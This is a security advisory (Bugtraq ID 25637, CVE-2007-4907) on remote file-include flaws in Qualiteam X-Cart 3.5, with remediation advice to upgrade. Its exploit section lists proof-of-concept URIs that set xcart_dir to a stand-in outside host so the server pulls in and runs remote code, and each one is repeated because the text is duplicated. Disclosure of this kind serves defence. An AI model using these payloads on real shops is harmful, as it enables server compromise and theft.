Qualiteam X-Cart xcart_dir Multiple Remote File Include Vulnerabilities
BID:25637
Info
Qualiteam X-Cart xcart_dir Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 25637 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-4907 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 11 2007 12:00AM |
| Updated: | May 07 2015 05:35PM |
| Credit: | aLiiF is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Qualiteam X-Cart 3.5 .0 |
| Not Vulnerable: |
Qualiteam X-Cart 4.1.8 |
Discussion
Qualiteam X-Cart xcart_dir Multiple Remote File Include Vulnerabilities
X-Cart is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
NOTE: The vendor reports that this issue affects only X-Cart 3.5.
X-Cart is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
NOTE: The vendor reports that this issue affects only X-Cart 3.5.
Exploit / POC
Qualiteam X-Cart xcart_dir Multiple Remote File Include Vulnerabilities
An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/[xcart-path]/config.php?xcart_dir=http://www.example2.com /[inject]?
http://www.example.com/[xcart-path]/prepare.php?xcart_dir=http://www.example2.com /[inject]?
http://www.example.com/[xcart-path]/smarty.php?xcart_dir=http://www.example2.com /[inject]?
http://www.example.com/[xcart-path]/customer/product.php?xcart_dir=http://www.example2.com /[inject]?
http://www.example.com/[xcart-path]/provider/auth.php?xcart_dir=http://www.example2.com /[inject]?
http://www.example.com/[xcart-path]/admin/auth.php?xcart_dir=http://www.example2.com /[inject]?
An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/[xcart-path]/config.php?xcart_dir=http://www.example2.com /[inject]?
http://www.example.com/[xcart-path]/prepare.php?xcart_dir=http://www.example2.com /[inject]?
http://www.example.com/[xcart-path]/smarty.php?xcart_dir=http://www.example2.com /[inject]?
http://www.example.com/[xcart-path]/customer/product.php?xcart_dir=http://www.example2.com /[inject]?
http://www.example.com/[xcart-path]/provider/auth.php?xcart_dir=http://www.example2.com /[inject]?
http://www.example.com/[xcart-path]/admin/auth.php?xcart_dir=http://www.example2.com /[inject]?
Solution / Fix
Qualiteam X-Cart xcart_dir Multiple Remote File Include Vulnerabilities
Solution:
The vendor has addressed this issue in versions after X-Cart 3.5. Users are advised to upgrade to the latest available version.
Solution:
The vendor has addressed this issue in versions after X-Cart 3.5. Users are advised to upgrade to the latest available version.
References
Qualiteam X-Cart xcart_dir Multiple Remote File Include Vulnerabilities
References:
References:
- X-Cart Homepage (X-Cart)